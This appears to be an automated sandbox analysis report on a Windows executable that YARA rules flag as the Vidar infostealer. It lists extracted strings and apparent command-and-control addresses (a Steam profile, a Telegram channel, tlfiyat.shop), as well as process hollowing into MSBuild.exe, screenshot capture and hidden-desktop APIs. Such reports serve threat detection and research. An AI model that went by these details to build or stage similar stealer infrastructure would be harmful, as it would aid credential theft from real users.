Source: chromecache_165.7.dr String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chromecache_168.7.dr String found in binary or memory: https://plus.google.com
Source: chromecache_168.7.dr String found in binary or memory: https://plus.googleapis.com
Source: chrome.exe, 00000005.00000003.1615872583.00001238031A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://policies.google.com/
Source: chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
Source: chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
Source: chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
Source: chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repository.luxtrust.lu0
Source: msedge.exe, 00000009.00000003.1754605445.00007BAC00764000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://res.cdn.office.net/
Source: msedge.exe, 00000009.00000003.1754965752.00007BAC029A8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754928245.00007BAC02978000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754699229.00007BAC0290C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754775930.00007BAC028FC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754573554.00007BAC02968000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754803717.00007BAC029C0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1753974560.00007BAC028EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754447420.00007BAC021B8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754605445.00007BAC00764000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sapphire.azureedge.net
Source: chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shieldedids-pa.googleapis.com2
Source: chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shieldedids-pa.googleapis.comJv
Source: chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shieldedids-pa.googleapis.comb
Source: chrome.exe, 00000005.00000003.1630860312.00001238024A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
Source: chrome.exe, 00000005.00000003.1635168932.0000123803598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1636629079.0000123803598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1634640330.0000123803598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1636686729.00001238035B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1636744125.0000123803694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635279712.0000123803658000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635448145.0000123803668000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635361646.0000123803660000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
Source: x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003A35000.00000004.00000800.00020000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1443465612.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003B0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003A35000.00000004.00000800.00020000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1426071903.0000000002971000.00000004.00000800.00020000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1443465612.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003B0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003A35000.00000004.00000800.00020000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1443465612.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003B0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: x9Lh8czsmo.exe, 00000000.00000002.1426071903.0000000002F33000.00000004.00000800.00020000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1426071903.0000000002971000.00000004.00000800.00020000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003B84000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 00000002.00000002.1986442365.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199819539662
Source: MSBuild.exe, 00000002.00000002.1986442365.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199819539662go2dnizMozilla/5.0
Source: msedge.exe, 00000009.00000003.1745126422.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743308706.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sts.windows-ppe.net/
Source: msedge.exe, 00000009.00000003.1745126422.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743308706.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sts.windows.net/
Source: MSBuild.exe, 00000002.00000002.1996007591.0000000003F59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: MSBuild.exe, 00000002.00000002.1996007591.0000000003F59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: MSBuild.exe, 00000002.00000002.1987744561.0000000000B65000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/
Source: MSBuild.exe, 00000002.00000002.1987744561.0000000000B65000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.1986442365.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/sc1phell
Source: MSBuild.exe, 00000002.00000002.1987744561.0000000000B65000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/sc1phellS
Source: MSBuild.exe, 00000002.00000002.1986442365.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/sc1phellgo2dnizMozilla/5.0
Source: MSBuild.exe, 00000002.00000002.1987744561.0000000000B65000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tlfiyat.shop
Source: MSBuild.exe, 00000002.00000002.1987744561.0000000000B80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tlfiyat.shop/
Source: MSBuild.exe, 00000002.00000002.1987744561.0000000000B80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tlfiyat.shopNz
Source: msedge.exe, 00000009.00000003.1740066082.00000160669F7000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1764566011.000001606D43D000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1741148190.000001606D402000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://unitedstates1.ss.wd.microsoft.us/
Source: msedge.exe, 00000009.00000003.1740066082.00000160669F7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://unitedstates1.ss.wd.microsoft.us/https://unitedstates4.ss.wd.microsoft.us/https://unitedstat
Source: msedge.exe, 00000009.00000003.1740066082.00000160669F7000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1764566011.000001606D43D000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1741148190.000001606D402000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://unitedstates2.ss.wd.microsoft.us/
Source: msedge.exe, 00000009.00000003.1740066082.00000160669F7000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1764566011.000001606D43D000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1741148190.000001606D402000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://unitedstates4.ss.wd.microsoft.us/
Source: msedge.exe, 00000009.00000003.1785247106.00007BAC03294000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://web.sogou.com/?
Source: MSBuild.exe, 00000002.00000002.1987744561.0000000000B65000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://web.telegram.org
Source: chromecache_168.7.dr String found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
Source: MSBuild.exe, 00000002.00000002.1994278216.0000000003C39000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.1994278216.0000000003D1E000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.1987744561.0000000000BED000.00000004.00000020.00020000.00000000.sdmp, gvk6ph.2.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.catcert.net/verarrel
Source: msedge.exe, 00000009.00000003.1782892772.00007BAC02D5C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.catcert.net/verarrel05
Source: msedge.exe, 00000009.00000003.1754605445.00007BAC00764000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.clarity.ms
Source: MSBuild.exe, 00000002.00000002.1991362026.0000000003948000.00000004.00000020.00020000.00000000.sdmp, u3ecje.2.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 00000005.00000003.1630860312.00001238024A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com
Source: chrome.exe, 00000005.00000003.1630860312.00001238024A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
Source: chrome.exe, 00000005.00000003.1630860312.00001238024A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: chrome.exe, 00000005.00000003.1618311202.0000123802EA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
Source: chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
Source: MSBuild.exe, 00000002.00000002.1991362026.0000000003948000.00000004.00000020.00020000.00000000.sdmp, u3ecje.2.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 00000005.00000003.1635168932.0000123803598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1636629079.0000123803598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1634640330.0000123803598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1636686729.00001238035B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1636744125.0000123803694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635279712.0000123803658000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635448145.0000123803668000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635361646.0000123803660000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
Source: chrome.exe, 00000005.00000003.1635361646.0000123803660000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635792851.000012380361C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
Source: chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: chrome.exe, 00000005.00000003.1618772647.0000123802514000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?q=$
Source: chrome.exe, 00000005.00000003.1630860312.00001238024A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
Source: chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/aida2
Source: chromecache_168.7.dr String found in binary or memory: https://www.googleapis.com/auth/plus.me
Source: chromecache_168.7.dr String found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
Source: chrome.exe, 00000005.00000003.1646589793.0000123803B50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1646218672.0000123803B48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
Source: chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
Source: chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
Source: chrome.exe, 00000005.00000003.1630860312.00001238024A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
Source: chrome.exe, 00000005.00000003.1630860312.00001238024A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: chromecache_165.7.dr String found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
Source: chromecache_165.7.dr String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
Source: chromecache_165.7.dr String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
Source: chrome.exe, 00000005.00000003.1636744125.0000123803694000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000005.00000003.1636594106.00001238030BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635168932.0000123803598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1636629079.0000123803598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1634640330.0000123803598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1636686729.00001238035B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1636744125.0000123803694000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000005.00000003.1636686729.00001238035B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1636744125.0000123803694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635279712.0000123803658000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635279712.0000123803678000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635448145.0000123803668000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635361646.0000123803660000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635792851.000012380361C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.49JL8PttH04.2019.O/rt=j/m=q_dnp
Source: chrome.exe, 00000005.00000003.1636686729.00001238035B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1636744125.0000123803694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635279712.0000123803658000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635279712.0000123803678000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635448145.0000123803668000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635361646.0000123803660000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635792851.000012380361C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.avVfaMsGWq0.L.W.O/m=qmd
Source: MSBuild.exe, 00000002.00000002.1994278216.0000000003C39000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.1994278216.0000000003D1E000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.1987744561.0000000000BED000.00000004.00000020.00020000.00000000.sdmp, gvk6ph.2.dr String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: msedge.exe, 00000009.00000003.1785247106.00007BAC03294000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ludashi.com/cms/server/monitor.php?id=
Source: msedge.exe, 00000009.00000003.1754605445.00007BAC00764000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.microsoftstart.com
Source: MSBuild.exe, 00000002.00000002.1996007591.0000000003F59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: MSBuild.exe, 00000002.00000002.1996007591.0000000003F59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: MSBuild.exe, 00000002.00000002.1996007591.0000000003F59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: MSBuild.exe, 00000002.00000002.1996007591.0000000003F59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: msedge.exe, 00000009.00000003.1754605445.00007BAC00764000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.msn.cn
Source: msedge.exe, 00000009.00000003.1754605445.00007BAC00764000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com
Source: msedge.exe, 00000009.00000003.1738803679.00007BAC0093C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1737860185.00007BAC0093C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1737491733.00007BAC0093C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: msedge.exe, 00000009.00000003.1738803679.00007BAC0093C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1737860185.00007BAC0093C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1737491733.00007BAC0093C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/Char
Source: msedge.exe, 00000009.00000003.1751788782.00007BAC00B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/Office=?
Source: msedge.exe, 00000009.00000003.1751788782.00007BAC00B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.tiktok.com/
Source: msedge.exe, 00000009.00000003.1751788782.00007BAC00B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://wwww.certigna.fr/autorites/0m
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 88.99.120.106:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_0040EAB5 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow, 2_2_0040EAB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00405AD3 memcpy,OpenDesktopA,CreateDesktopA,lstrcpyA,CreateProcessA,Sleep,CloseDesktop, 2_2_00405AD3

System Summary

Source: 2.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 0.2.x9Lh8czsmo.exe.3b52430.2.unpack, type: UNPACKEDPE Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 00000002.00000002.1986442365.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05ED9540 NtResumeThread, 0_2_05ED9540
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05ED5768 NtProtectVirtualMemory, 0_2_05ED5768
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05ED953B NtResumeThread, 0_2_05ED953B
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05ED5760 NtProtectVirtualMemory, 0_2_05ED5760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 0040D84A appears 139 times
Source: x9Lh8czsmo.exe, 00000000.00000002.1443815308.0000000005D60000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs x9Lh8czsmo.exe
Source: x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003A35000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs x9Lh8czsmo.exe
Source: x9Lh8czsmo.exe, 00000000.00000002.1441635562.0000000004EB0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameWxject.dll" vs x9Lh8czsmo.exe
Source: x9Lh8czsmo.exe, 00000000.00000002.1426071903.0000000002971000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs x9Lh8czsmo.exe
Source: x9Lh8czsmo.exe, 00000000.00000002.1443465612.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs x9Lh8czsmo.exe
Source: x9Lh8czsmo.exe, 00000000.00000002.1424532250.00000000009CE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs x9Lh8czsmo.exe
Source: x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003B0C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs x9Lh8czsmo.exe
Source: x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003B0C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameWxject.dll" vs x9Lh8czsmo.exe
Source: x9Lh8czsmo.exe, 00000000.00000000.1411772955.00000000004AE000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameHojzy.exe, vs x9Lh8czsmo.exe
Source: x9Lh8czsmo.exe Binary or memory string: OriginalFilenameHojzy.exe, vs x9Lh8czsmo.exe
Source: x9Lh8czsmo.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 2.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 0.2.x9Lh8czsmo.exe.3b52430.2.unpack, type: UNPACKEDPE Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 00000002.00000002.1986442365.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: x9Lh8czsmo.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: x9Lh8czsmo.exe, RecommenderTask.cs Cryptographic APIs: 'TransformFinalBlock'
Source: x9Lh8czsmo.exe, RecommenderTask.cs Cryptographic APIs: 'TransformFinalBlock'
Source: x9Lh8czsmo.exe, AutomatedExtractor.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.x9Lh8czsmo.exe.5d60000.11.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.x9Lh8czsmo.exe.5d60000.11.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.x9Lh8czsmo.exe.5d60000.11.raw.unpack, Task.cs Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.x9Lh8czsmo.exe.5d60000.11.raw.unpack, TaskService.cs Task registration methods: 'CreateFromToken'
Source: 0.2.x9Lh8czsmo.exe.5d60000.11.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.x9Lh8czsmo.exe.5d60000.11.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.x9Lh8czsmo.exe.5d60000.11.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: x9Lh8czsmo.exe, EditableList.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.x9Lh8czsmo.exe.5d60000.11.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.x9Lh8czsmo.exe.5d60000.11.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.x9Lh8czsmo.exe.5d60000.11.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@51/112@28/16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_0040F029 CreateToolhelp32Snapshot,Process32First,StrCmpCA,Process32Next,StrCmpCA,CloseHandle, 2_2_0040F029
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\GWZ5NQBG.htm
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8932:120:WilError_03
